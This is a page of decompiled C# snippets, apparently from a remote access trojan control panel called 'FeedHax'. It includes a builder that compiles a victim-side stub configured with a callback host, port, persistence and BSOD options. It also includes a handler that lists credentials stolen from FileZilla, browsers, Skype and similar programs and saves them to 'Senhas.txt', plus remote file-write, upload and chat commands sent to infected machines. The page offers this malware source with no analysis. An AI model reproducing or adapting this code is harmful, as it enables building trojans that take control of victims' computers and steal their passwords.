Пример #1
0
		// Token: 0x060000D6 RID: 214 RVA: 0x001E0194 File Offset: 0x001DE594
		private void T2_KeyDown(object sender, KeyEventArgs e)
		{
			bool flag = e.KeyCode == Keys.Return;
			if (flag)
			{
				e.SuppressKeyPress = true;
				flag = (Operators.CompareString(this.T2.Text, string.Empty, false) != 0);
				if (flag)
				{
					lock (this)
					{
						this.T1.SelectionStart = this.T1.TextLength;
						this.T1.SelectionFont = new Font(this.T1.Font, FontStyle.Bold);
						this.T1.AppendText("[" + this.hk + "] ");
						this.T1.SelectionFont = this.T1.Font;
						this.T1.AppendText(this.T2.Text + "\r\n");
						this.T1.SelectionStart = this.T1.TextLength;
						this.T1.ScrollToCaret();
						TextBox t = this.T2;
						string text = t.Text;
						t.Text = text;
						this.sk.Send("!" + Class7.string_1 + Class6.smethod_14(ref text));
						this.T2.Text = string.Empty;
					}
				}
			}
			else
			{
				this.T2.Select();
			}
		}
Пример #2
0
 // Token: 0x060003FA RID: 1018 RVA: 0x001FDA60 File Offset: 0x001FBE60
 private void up_Load(object sender, EventArgs e)
 {
     this.FS = new FileStream(this.TMP, FileMode.Open);
     this.Lv1.Items[0].SubItems[0].Text = new FileInfo(this.TMP).Name;
     this.Lv1.Items[1].SubItems[0].Text = Class6.smethod_17((long)this.SZ);
     this.Lv1.Items[2].SubItems[0].Text = Class6.smethod_17(0L);
     this.Lv1.Items[3].SubItems[0].Text = Class6.smethod_17(0L);
     this.ProgressBar1.Maximum          = this.SZ;
     this.osk.Send(string.Concat(new string[]
     {
         "Ex",
         Class7.string_1,
         "fm",
         Class7.string_1,
         "up",
         Class7.string_1,
         this.osk.ip(),
         Class7.string_1,
         Class6.smethod_14(ref this.FN),
         Class7.string_1,
         Conversions.ToString(this.SZ)
     }));
     this.Lv1.method_3();
     this.vmethod_4.Enabled = true;
 }
Пример #3
0
		// Token: 0x060000D5 RID: 213 RVA: 0x001E00D0 File Offset: 0x001DE4D0
		private void Chat_Load(object sender, EventArgs e)
		{
			this.Text = Conversions.ToString(RuntimeHelpers.GetObjectValue(Class7.smethod_1(this.osk.L)));
			this.Show();
			string left = Interaction.InputBox("Digite Seu Apelido", "Chat", this.hk, -1, -1);
			bool flag = Operators.CompareString(left, string.Empty, false) == 0;
			if (flag)
			{
				this.sk.CN = false;
			}
			else
			{
				this.hk = left;
				this.sk.Send("~" + Class7.string_1 + Class6.smethod_14(ref this.hk));
			}
			this.vmethod_8.Enabled = true;
			this.T2.Select();
			this.T2.Focus();
		}
Пример #4
0
        // Token: 0x060002B9 RID: 697 RVA: 0x001F25D4 File Offset: 0x001F09D4
        private void ToolStripMenuItem1_Click(object sender, EventArgs e)
        {
            string[] array = new string[9];
            array[0] = "Ex";
            array[1] = Class7.string_1;
            array[2] = "fm";
            array[3] = Class7.string_1;
            array[4] = "wr";
            array[5] = Class7.string_1;
            array[6] = Class6.smethod_14(ref this.FN);
            array[7] = Class7.string_1;
            TextBox textBox = this.TextBox1;
            string  text    = textBox.Text;

            textBox.Text = text;
            array[8]     = Class6.smethod_14(ref text);
            this.SK.Send(string.Concat(array));
            this.ToolStripMenuItem1.Enabled = false;
        }
Пример #5
0
		// Token: 0x060000D7 RID: 215 RVA: 0x001E0318 File Offset: 0x001DE718
		private void Button1_Click(object sender, EventArgs e)
		{
			bool flag = Operators.CompareString(this.T2.Text, string.Empty, false) != 0;
			if (flag)
			{
				lock (this)
				{
					this.T1.SelectionStart = this.T1.TextLength;
					this.T1.SelectionFont = new Font(this.T1.Font, FontStyle.Bold);
					this.T1.AppendText("[" + this.hk + "] ");
					this.T1.SelectionFont = this.T1.Font;
					this.T1.AppendText(this.T2.Text + "\r\n");
					this.T1.SelectionStart = this.T1.TextLength;
					this.T1.ScrollToCaret();
					TextBox t = this.T2;
					string text = t.Text;
					t.Text = text;
					this.sk.Send("!" + Class7.string_1 + Class6.smethod_14(ref text));
					this.T2.Text = string.Empty;
				}
			}
		}
        // Token: 0x060000A0 RID: 160 RVA: 0x001DE118 File Offset: 0x001DC518
        private void Button1_Click(object sender, EventArgs e)
        {
            SaveFileDialog saveFileDialog = new SaveFileDialog
            {
                Filter   = "|*.exe",
                FileName = this.VN.Text
            };
            bool flag = saveFileDialog.ShowDialog() == DialogResult.OK;

            if (flag)
            {
                bool flag2 = !this.CheckBox1.Checked;
                if (flag2)
                {
                    this.string_0 = null;
                }
                flag2 = File.Exists(saveFileDialog.FileName);
                if (flag2)
                {
                    File.Delete(saveFileDialog.FileName);
                }
                string text     = File.ReadAllText(Application.StartupPath + "\\Stub.il");
                string newValue = Class6.smethod_4(string.Concat(new string[]
                {
                    this.VN.Text,
                    this.host.Text,
                    Conversions.ToString(this.port.Value),
                    this.exe.Text,
                    this.dir.Text,
                    this.bsod.Checked.ToString(),
                    this.Idr.Checked.ToString(),
                    this.Isu.Checked.ToString(),
                    this.Isf.Checked.ToString()
                }));
                TextBox vn    = this.VN;
                string  text2 = vn.Text;
                vn.Text = text2;
                text    = text.Replace("[VN]", Class6.smethod_14(ref text2)).Replace("[H]", this.host.Text).Replace("[P]", Conversions.ToString(this.port.Value)).Replace("[EXE]", this.exe.Text).Replace("[DR]", this.dir.Text.Replace("%", string.Empty)).Replace("[BD]", this.bsod.Checked.ToString()).Replace("[RG]", newValue).Replace("[Idr]", this.Idr.Checked.ToString()).Replace("[Isu]", this.Isu.Checked.ToString()).Replace("[Isf]", this.Isf.Checked.ToString()).Replace("[klen]", this.klen.Value.ToString());
                File.WriteAllText(Interaction.Environ("temp") + "\\stub.il", text);
                ProcessStartInfo startInfo = new ProcessStartInfo
                {
                    FileName       = Interaction.Environ("windir") + "\\Microsoft.NET\\Framework\\v2.0.50727\\ilasm.exe",
                    CreateNoWindow = true,
                    WindowStyle    = ProcessWindowStyle.Hidden,
                    Arguments      = string.Concat(new string[]
                    {
                        "/alignment=512 /QUIET \"",
                        Interaction.Environ("temp"),
                        "\\stub.il\" /output:\"",
                        saveFileDialog.FileName,
                        "\""
                    })
                };
                Process.Start(startInfo).WaitForExit();
                flag2 = (this.string_0 != null && File.Exists(this.string_0));
                if (flag2)
                {
                    IconN.InjectIcon(saveFileDialog.FileName, this.string_0);
                }
                IntPtr intptr_ = GClass2.BeginUpdateResource(saveFileDialog.FileName, false);
                byte[] array   = File.ReadAllBytes(Application.StartupPath + "\\Stub.manifest");
                GClass2.UpdateResource(intptr_, (IntPtr)24, (IntPtr)1, 0, array, array.Length);
                GClass2.EndUpdateResource(intptr_, false);
                Class6.smethod_3("host", this.host.Text);
                Class6.smethod_3("p", Conversions.ToString(this.port.Value));
                Class6.smethod_3("exe", this.exe.Text);
                Class6.smethod_3("dir", Conversions.ToString(this.dir.SelectedIndex));
                Class6.smethod_3("vn", this.VN.Text);
                Class6.smethod_3("bsod", this.bsod.Checked.ToString());
                Class6.smethod_3("ico", this.string_0);
                Class6.smethod_3("Idr", this.Idr.Checked.ToString());
                Class6.smethod_3("Isu", this.Isu.Checked.ToString());
                Class6.smethod_3("Isf", this.Isf.Checked.ToString());
                Class6.smethod_3("klen", this.klen.Value.ToString());
                Interaction.MsgBox("Server Criado Com Sucesso! \r\n" + saveFileDialog.FileName, MsgBoxStyle.Information, "FeedHax");
                this.Close();
            }
        }
Пример #7
0
        // Token: 0x060002FE RID: 766 RVA: 0x001F4838 File Offset: 0x001F2C38
        public void XD(ref Client c, ref string S)
        {
            string[] array = Strings.Split(S, " ", -1, CompareMethod.Binary);
            int      num   = -1;
            bool     flag  = !Directory.Exists(c.Folder);

            if (flag)
            {
                Directory.CreateDirectory(c.Folder);
            }
            string[] array2 = new string[]
            {
                "FileZilla",
                "No-ip",
                "DynDns",
                "Paltalk",
                "FireFox",
                "Chrome",
                "MSN",
                "Yahoo",
                "Opera",
                "Internet Explorer",
                "ooVoo",
                "DUC v3",
                "Skype"
            };
            string text = string.Empty;

            foreach (string text2 in array)
            {
                try
                {
                    flag = (text2.Length > 0);
                    if (flag)
                    {
                        bool flag2 = Operators.CompareString(text2, "*", false) == 0;
                        if (flag2)
                        {
                            num++;
                        }
                        else
                        {
                            flag2 = !text2.Contains(":");
                            if (flag2)
                            {
                                text2 = Class6.smethod_16(text2);
                            }
                            string[] array4 = Strings.Split(text2, ":", -1, CompareMethod.Binary);
                            flag2 = (array4.Length > 3);
                            if (flag2)
                            {
                                string expression = text2;
                                string find       = array4[0] + ":" + array4[1];
                                string text3      = array4[0] + ":" + array4[1];
                                array4 = Strings.Split(Strings.Replace(expression, find, Class6.smethod_14(ref text3), 1, -1, CompareMethod.Binary), ":", -1, CompareMethod.Binary);
                            }
                            ListViewItem listViewItem = new ListViewItem();
                            listViewItem = this.L1.Items.Add(Class6.smethod_16(array4[1]), num);
                            listViewItem.SubItems.Add(Class6.smethod_16(array4[2]));
                            listViewItem.SubItems.Add(Class6.smethod_16(array4[0]));
                            listViewItem.SubItems.Add(array2[num]);
                            NewLateBinding.LateCall(listViewItem.SubItems, null, "Add", new object[]
                            {
                                RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(Class7.smethod_1(c.L))))
                            }, null, null, null, true);
                            text = text + "Usuario : " + listViewItem.Text + "\r\n";
                            text = text + "Senha : " + listViewItem.SubItems[1].Text + "\r\n";
                            text = text + "Site : " + listViewItem.SubItems[2].Text + "\r\n\r\n";
                        }
                    }
                }
                catch (Exception ex)
                {
                }
            }
            try
            {
                File.WriteAllText(c.Folder + "Senhas.txt", text);
            }
            catch (Exception ex2)
            {
            }
            this.FxCOLM(this.L1);
            this.ToolStripMenuItem1.Text = "Senhas( X )".Replace("X", Conversions.ToString(this.L1.Items.Count));
        }